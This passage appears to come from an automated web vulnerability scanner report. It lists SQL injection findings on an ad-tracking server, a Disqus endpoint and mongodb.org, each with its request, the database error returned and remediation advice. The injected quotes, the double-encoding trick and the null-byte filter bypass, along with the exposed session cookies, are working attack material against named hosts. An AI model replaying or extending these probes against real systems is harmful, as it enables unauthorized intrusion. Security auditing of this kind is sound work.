Cookie: VINDICOAUDIENCEISSUEDIDENTITY=245a9d68-6452-49a8-98f4-7fb38d8d1b33; vpp=245a9d68-6452-49a8-98f4-7fb38d8d1b33

Response 2

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Type: text/html
Date: Wed, 05 Oct 2011 18:40:32 GMT
Expires: Wed, 05 Oct 2011 18:40:32 GMT
Location: http://vindicoasset.edgesuite.net/Repository/CampaignCreative/Campaign_6618/BANNERCREATIVE/Suave_300x60.jpg
Server: Microsoft-IIS/7.5
X-VINDICO-Instance: i-8570ceeb
Content-Length: 228
Connection: keep-alive

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://vindicoasset.edgesuite.net/Repository/CampaignCreative/Campaign_6618/BANNERCREATIVE/Suave_3
...[SNIP]...

1.18. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The adRotationId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the adRotationId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1606&syndicationOutletId=66922&campaignId=6618&adRotationId=23337'&bannerCreativeAdModuleId=31602&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6618%2fBANNERCREATIVE%2fSuave_300x60.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=245a9d68-6452-49a8-98f4-7fb38d8d1b33; vpp=245a9d68-6452-49a8-98f4-7fb38d8d1b33

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Wed, 05 Oct 2011 18:39:23 GMT
Expires: Wed, 05 Oct 2011 18:39:24 GMT
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
X-VINDICO-Instance: i-e9977187
Content-Length: 712
Connection: keep-alive

<br>Error Description:Incorrect syntax near ', @ipAddress = '.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1606, @bannerCreativeAdModuleId = 31602, @campaignId = 6618, @syndicationOutletId =
...[SNIP]...

1.19. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The bannerCreativeAdModuleId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the bannerCreativeAdModuleId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1606&syndicationOutletId=66922&campaignId=6618&adRotationId=23337&bannerCreativeAdModuleId=31602'&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6618%2fBANNERCREATIVE%2fSuave_300x60.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=245a9d68-6452-49a8-98f4-7fb38d8d1b33; vpp=245a9d68-6452-49a8-98f4-7fb38d8d1b33

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Wed, 05 Oct 2011 18:39:29 GMT
Expires: Wed, 05 Oct 2011 18:39:30 GMT
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
X-VINDICO-Instance: i-e9977187
Content-Length: 785
Connection: keep-alive

<br>Error Description:Incorrect syntax near ', @campaignId = 6618, @syndicationOutletId = 66922, @adrotationId = 23337, @ipAddress = '.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1606, @ban
...[SNIP]...

1.20. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The campaignId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the campaignId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1606&syndicationOutletId=66922&campaignId=6618'&adRotationId=23337&bannerCreativeAdModuleId=31602&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6618%2fBANNERCREATIVE%2fSuave_300x60.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=245a9d68-6452-49a8-98f4-7fb38d8d1b33; vpp=245a9d68-6452-49a8-98f4-7fb38d8d1b33

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Wed, 05 Oct 2011 18:39:18 GMT
Expires: Wed, 05 Oct 2011 18:39:19 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQCSSCRDD=HEMHDJKBGEGGNNEGDGFIEGMK; path=/
Vary: Accept-Encoding
X-VINDICO-Instance: i-e9977187
Content-Length: 765
Connection: keep-alive

<br>Error Description:Incorrect syntax near ', @syndicationOutletId = 66922, @adrotationId = 23337, @ipAddress = '.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1606, @bannerCreativeAdModuleI
...[SNIP]...

1.21. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The siteId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the siteId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1606'&syndicationOutletId=66922&campaignId=6618&adRotationId=23337&bannerCreativeAdModuleId=31602&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6618%2fBANNERCREATIVE%2fSuave_300x60.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=245a9d68-6452-49a8-98f4-7fb38d8d1b33; vpp=245a9d68-6452-49a8-98f4-7fb38d8d1b33

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Wed, 05 Oct 2011 18:39:06 GMT
Expires: Wed, 05 Oct 2011 18:39:06 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSSBTCSRB=IGABDBBCCFAANHIDHBEENAAN; path=/
Vary: Accept-Encoding
X-VINDICO-Instance: i-b570cedb
Content-Length: 820
Connection: keep-alive

<br>Error Description:Incorrect syntax near ', @bannerCreativeAdModuleId = 31602, @campaignId = 6618, @syndicationOutletId = 66922, @adrotationId = 23337, @ipAddress = '.<br>SQL:[Track_BannerCreativeI
...[SNIP]...

1.22. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The syndicationOutletId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the syndicationOutletId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1606&syndicationOutletId=66922'&campaignId=6618&adRotationId=23337&bannerCreativeAdModuleId=31602&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6618%2fBANNERCREATIVE%2fSuave_300x60.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=245a9d68-6452-49a8-98f4-7fb38d8d1b33; vpp=245a9d68-6452-49a8-98f4-7fb38d8d1b33

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Wed, 05 Oct 2011 18:39:12 GMT
Expires: Wed, 05 Oct 2011 18:39:12 GMT
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
X-VINDICO-Instance: i-072c8a69
Content-Length: 735
Connection: keep-alive

<br>Error Description:Incorrect syntax near ', @adrotationId = 23337, @ipAddress = '.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1606, @bannerCreativeAdModuleId = 31602, @campaignId = 6618,
...[SNIP]...

1.23. http://unionsquareventures.disqus.com/thread.js [sessionid cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://unionsquareventures.disqus.com
Path:   /thread.js

Issue detail

The sessionid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sessionid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the sessionid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /thread.js?url=http%3A%2F%2Fwww.usv.com%2F2009%2F05%2Fhacking-education.php&title=Hacking%20Education%20&sort=&per_page&category_id=&developer=0&identifier=&disqus_version=1317686231&1317849652881 HTTP/1.1
Host: unionsquareventures.disqus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.usv.com/2009/05/hacking-education.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: disqus_unique=608614822849; __qca=P0-943627109-1315055753168; sessionid=da6d5c6cb2e467d6962953b510669b19%2527; test=1; __utma=113869458.1840189074.1315055753.1317845533.1317847345.24; __utmb=113869458.10.10.1317847345; __utmc=113869458; __utmz=113869458.1317847345.24.24.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/2011/09/were-hiring-1.php

Response 1

HTTP/1.0 504 Gateway Time-out
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>504 Gateway Time-out</h1>
The server didn't respond in time.
</body></html>

Request 2

GET /thread.js?url=http%3A%2F%2Fwww.usv.com%2F2009%2F05%2Fhacking-education.php&title=Hacking%20Education%20&sort=&per_page&category_id=&developer=0&identifier=&disqus_version=1317686231&1317849652881 HTTP/1.1
Host: unionsquareventures.disqus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.usv.com/2009/05/hacking-education.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: disqus_unique=608614822849; __qca=P0-943627109-1315055753168; sessionid=da6d5c6cb2e467d6962953b510669b19%2527%2527; test=1; __utma=113869458.1840189074.1315055753.1317845533.1317847345.24; __utmb=113869458.10.10.1317847345; __utmc=113869458; __utmz=113869458.1317847345.24.24.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/2011/09/were-hiring-1.php

Response 2

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 21:24:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-User: anon:608614822849
Content-Language: en-us
Vary: Accept-Language,Cookie,Accept-Encoding
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: test=1; Path=/
Set-Cookie: sessionid=8bd3193c82f194c2337d92506bf48e8a; Domain=.disqus.com; expires=Wed, 19-Oct-2011 21:24:53 GMT; Max-Age=1209600; Path=/
Content-Length: 168925
Connection: close
Content-Type: text/javascript; charset=UTF-8

/*jslint evil:true */
/**
* Dynamic thread loader
*
*
*
*
*
*
*/

//
var DISQUS;
if (!DISQUS || typeof DISQUS == 'function') {
throw "DISQUS object is not initialized";
}
//

// json
...[SNIP]...

1.24. http://www.mongodb.org/dosearchsite.action [queryString parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /dosearchsite.action

Issue detail

The queryString parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the queryString parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /dosearchsite.action?queryString=xss%00'&where=DOCS HTTP/1.1
Host: www.mongodb.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mongodb.org/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-903498723-1317847440961; __sid=f958052587ceea881f0f6613baa6bca1affdc622; rack.session=BAh7AA%3D%3D%0A; __utma=266042259.2136194057.1317847505.1317847505.1317847505.1; __utmb=266042259.1.10.1317847505; __utmc=266042259; __utmz=266042259.1317847505.1.1.utmcsr=blog.mongodb.org|utmccn=(referral)|utmcmd=referral|utmcct=/; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1317847440676-16815; WRUID=0

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:46:17 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
org.springframework.dao.DataIntegrityViolationException: Hibernate operation: Could not execute query; SQL []; ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00; nested exception is org.postgresql.util.PSQLException: ERROR: invalid byte sequence for encoding &quot;UTF8&quot;: 0x00 at /search/searchpanel.vm[line 46, column 14]<br>
...[SNIP]...

1.25. http://www.mongodb.org/images/border/border_bottom.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mongodb.org
Path:   /images/border/border_bottom.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /images%2527/border/border_bottom.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /images%2527%2527/border/border_bottom.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response 2

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=UTF-8
Date: Wed, 05 Oct 2011 20:50:14 GMT
X-xgen-cache: yes
X-Cache-Info: caching
Content-Length: 2285

<html>
<head>
   <link rel="stylesheet" type="text/css" href="/styles/main-action.css" />
   <link rel="stylesheet" type="text/css" href="/includes/css/master.css" />
   <link rel="stylesheet" type="text/cs
...[SNIP]...

1.26. http://www.mongodb.org/s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:dialog/com.atlassian.auiplugin:dialog.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:dialog/com.atlassian.auiplugin:dialog.css

Issue detail

The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 7, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0.2/_/download/batch'/com.atlassian.auiplugin:dialog/com.atlassian.auiplugin:dialog.css?ieonly=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:50:14 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.27. http://www.mongodb.org/s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:dialog/com.atlassian.auiplugin:dialog.css [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:dialog/com.atlassian.auiplugin:dialog.css

Issue detail

The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 8, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:dialog'/com.atlassian.auiplugin:dialog.css?ieonly=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response 1

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:50:16 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

Request 2

GET /s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:dialog''/com.atlassian.auiplugin:dialog.css?ieonly=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response 2

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

1.28. http://www.mongodb.org/s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:drop-down/com.atlassian.auiplugin:drop-down.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:drop-down/com.atlassian.auiplugin:drop-down.css

Issue detail

The REST URL parameter 7 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 7, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0.2/_/download/batch'/com.atlassian.auiplugin:drop-down/com.atlassian.auiplugin:drop-down.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:50:10 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.29. http://www.mongodb.org/s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:drop-down/com.atlassian.auiplugin:drop-down.css [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:drop-down/com.atlassian.auiplugin:drop-down.css

Issue detail

The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 8, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:drop-down'/com.atlassian.auiplugin:drop-down.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response

HTTP/1.1 500 Internal Server Error
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 05 Oct 2011 20:50:11 GMT
Connection: close
X-xgen-cache: yes
X-Cache-Info: not cacheable; response code not cacheable


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
<br>

Database Dialect: net.sf.hibernate.dialect.PostgreSQLDialect<br>
...[SNIP]...

1.30. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.macros.profile:profile-macro-styles/confluence.macros.profile:profile-macro-styles.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mongodb.org
Path:   /s/1627/3/1.0/_/download/batch/confluence.macros.profile:profile-macro-styles/confluence.macros.profile:profile-macro-styles.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /s/1627/3/1.0/_%2527/download/batch/confluence.macros.profile:profile-macro-styles/confluence.macros.profile:profile-macro-styles.css?ieonly=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /s/1627/3/1.0/_%2527%2527/download/batch/confluence.macros.profile:profile-macro-styles/confluence.macros.profile:profile-macro-styles.css?ieonly=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.mongodb.org

Response 2

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Cache-Control: max-age=3600
Content-Type: text/html;charset=UTF-8
